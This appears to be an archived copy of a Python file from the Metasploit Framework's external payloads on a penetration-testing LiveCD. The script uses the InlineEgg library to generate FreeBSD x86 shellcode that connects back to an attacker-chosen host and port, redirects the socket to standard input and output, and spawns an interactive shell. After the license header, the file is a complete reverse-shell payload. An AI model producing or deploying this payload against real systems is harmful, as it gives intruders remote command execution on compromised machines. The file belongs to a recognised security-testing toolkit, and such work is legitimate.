home *** CD-ROM | disk | FTP | other *** search
/ Chip 2007 January, February, March & April / Chip-Cover-CD-2007-02.iso / Pakiet bezpieczenstwa / mini Pentoo LiveCD 2006.1 / mpentoo-2006.1.iso / livecd.squashfs / usr / lib / metasploit / payloads / external / bsdx86reverse_ie.py < prev    next >
Text File  |  2006-06-30  |  3KB  |  82 lines

  1. #!/usr/bin/env python
  2. #--
  3. # Copyright (c) 2002,2003 Core Security Technologies, Core SDI Inc.
  4. # All rights reserved.
  5. #
  6. #    Unless you have express writen permission from the Copyright Holder, any
  7. # use of or distribution of this software or portions of it, including, but not
  8. # limited to, reimplementations, modifications and derived work of it, in
  9. # either source code or any other form, as well as any other software using or
  10. # referencing it in any way, may NOT be sold for commercial gain, must be
  11. # covered by this very same license, and must retain this copyright notice and
  12. # this license.
  13. #    Neither the name of the Copyright Holder nor the names of its contributors
  14. # may be used to endorse or promote products derived from this software
  15. # without specific prior written permission.
  16. #
  17. # THERE IS NO WARRANTY FOR THE SOFTWARE, TO THE EXTENT PERMITTED BY APPLICABLE
  18. # LAW. EXCEPT WHEN OTHERWISE STATED IN WRITING THE COPYRIGHT HOLDERS AND/OR
  19. # OTHER PARTIES PROVIDE THE SOFTWARE "AS IS" WITHOUT WARRANTY OF ANY KIND,
  20. # EITHER EXPRESSED OR IMPLIED, INCLUDING, BUT NOT LIMITED TO, THE IMPLIED
  21. # WARRANTIES OF MERCHANTABILITY AND FITNESS FOR A PARTICULAR PURPOSE. THE
  22. # ENTIRE RISK AS TO THE QUALITY AND PERFORMANCE OF THE SOFTWARE IS WITH YOU.
  23. # SHOULD THE SOFTWARE PROVE DEFECTIVE, YOU ASSUME THE COST OF ALL NECESSARY
  24. # SERVICING, REPAIR OR CORRECTION.
  25. #
  26. # IN NO EVENT UNLESS REQUIRED BY APPLICABLE LAW OR AGREED TO IN WRITING WILL
  27. # ANY COPYRIGHT HOLDER, OR ANY OTHER PARTY WHO MAY MODIFY AND/OR REDISTRIBUTE
  28. # THE SOFTWARE AS PERMITTED ABOVE, BE LIABLE TO YOU FOR DAMAGES, INCLUDING ANY
  29. # GENERAL, SPECIAL, INCIDENTAL OR CONSEQUENTIAL DAMAGES ARISING OUT OF THE USE
  30. # OR INABILITY TO USE THE SOFTWARE (INCLUDING BUT NOT LIMITED TO LOSS OF DATA OR
  31. # DATA BEING RENDERED INACCURATE OR LOSSES SUSTAINED BY YOU OR THIRD PARTIES OR
  32. # A FAILURE OF THE SOFTWARE TO OPERATE WITH ANY OTHER SOFTWARE), EVEN IF SUCH
  33. # HOLDER OR OTHER PARTY HAS BEEN ADVISED OF THE POSSIBILITY OF SUCH DAMAGES.
  34. #
  35. # gera [at corest.com]
  36. #--
  37.  
  38.  
  39. ##
  40. # Modified to work as an external payload for Metasploit Framework 2.0
  41. ##
  42.  
  43. from inlineegg import *
  44. import socket
  45. import struct
  46. import sys
  47.  
  48.  
  49. def Egg(opts):
  50.  
  51.     if not opts.has_key("LHOST") or not opts.has_key("LPORT"):
  52.         return
  53.  
  54.     connect_addr = opts["LHOST"]
  55.     connect_port = int(opts["LPORT"])
  56.  
  57.     egg = InlineEgg(FreeBSDx86Syscall)
  58.  
  59.     # connect to other side
  60.     sock = egg.socket(socket.AF_INET,socket.SOCK_STREAM)
  61.     sock = egg.save(sock)
  62.     egg.connect(sock,(connect_addr, connect_port))
  63.  
  64.     # dup an exec
  65.     egg.dup2(sock, 0)
  66.     egg.dup2(sock, 1)
  67.     egg.dup2(sock, 2)
  68.     egg.execve('/bin/sh',('bash','-i'))
  69.     return egg
  70.  
  71. def main():
  72.      opts = {}
  73.      for o in sys.argv[1:]:
  74.          x = o.split("=")
  75.          if len(x) == 2:
  76.              opts[x[0]] = x[1]
  77.      egg = Egg(opts)
  78.      if egg != None:
  79.          sys.stdout.write(egg.getCode())
  80.          
  81. main()
  82.